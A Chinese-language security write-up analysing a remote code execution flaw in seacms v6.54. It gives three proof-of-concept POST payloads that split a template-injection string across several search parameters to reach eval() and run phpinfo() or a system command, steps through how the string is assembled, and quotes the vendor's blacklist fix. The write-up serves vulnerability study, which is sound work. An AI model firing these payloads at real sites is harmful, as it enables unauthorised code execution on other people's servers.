1.环境:
php5.5.38+apache+seacms v6.54
上一篇文章针对seacms v6.45 进行了分析,官方给出针对修复前台geishell提供的方法为增加:
$order = ($order == "commend" || $order == "time" || $order == "hit") ? $order : "";
并且在v6.54中增加了对传入变量的长度限制,限制为20个字符之内,因此单一针对一个变量的绕过方法不满足长度要求,所以在该版本中才进行了多次替换绕过
每一次传进去的长度刚好20,思路挺不错的(当然小于此长度也可以)
但是在echoSearchPage()函数中声明的global变量并不是只有$order一个,可以利用其他的参数构造payload进入$content变量,从而导致代码执行,整个漏洞链构造流程环环相扣,最终聚焦在eval()函数上
2.poc1:
http://192.168.0.6/seacms654/search.php
POST:
searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpage:jq}&jq=($_P{searchpage:ver}&&ver=OST[9]))&9[]=ph&9[]=pinfo();
poc2:
searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan={searchpage:jq}&jq=($_P{searchpage:ver}&&ver=OST[9])&9=phpinfo();
poc3:
searchtype=5&searchword={if{searchpage:year}&year=:s{searchpage:area}}&area=y{searchpage:letter}&letter=st{searchpage:lang}&yuyan=em{searchpage:jq}&jq=($_P{searchpage:ver}&&ver=OST[9])&9=whoami //命令执行
3.演示效果:
4.漏洞分析
因为最终利用的是parseif函数,并且要利用到global声明的变量,因此我选择在65行和214行下断点进行分析
执行payload,使用F8开始单步调试,我们关注以下7个变量的值:
从157行开始,利用从global声明的变量开始对$content中的内容进行替换
第1处替换:
首先使用$searchword变量的值进行了替换,可以看到替换以后与之前的对比
第2处替换:
将$year变量的值替换了进来
第3处替换:
将变量$area的值替换了进来,
第4处替换:
将变量$letter的值替换了进来
第5处替换:
将变量$yuyan的值替换了进来
第6处替换:
将$jq变量的值替换进来
第7处替换:
将$ver变量的值替换进来
触发远程代码执行,到此已经拼接成了完整的payload,此时$strIf的内容没有任何过滤就带入了eval函数执行!!!
eval(join($_POST[9]))
官方修复方法:
在parseIf函数中添加了黑名单,替换了一些敏感字符串
function parseIf($content){ if (strpos($content,'{if:')=== false){ return $content; }else{ $labelRule = buildregx("{if:(.*?)}(.*?){end if}","is"); $labelRule2="{elseif"; $labelRule3="{else}"; preg_match_all($labelRule,$content,$iar); foreach($iar as $v){ $iarok[] = str_replace(array('unlink','opendir','mysqli_','mysql_','socket_','curl_','base64_','putenv','popen(','phpinfo','pfsockopen','proc_','preg_','_GET','_POST','_COOKIE','_REQUEST','_SESSION','eval(','file_','passthru(','exec(','system(','shell_'), '@.@', $v);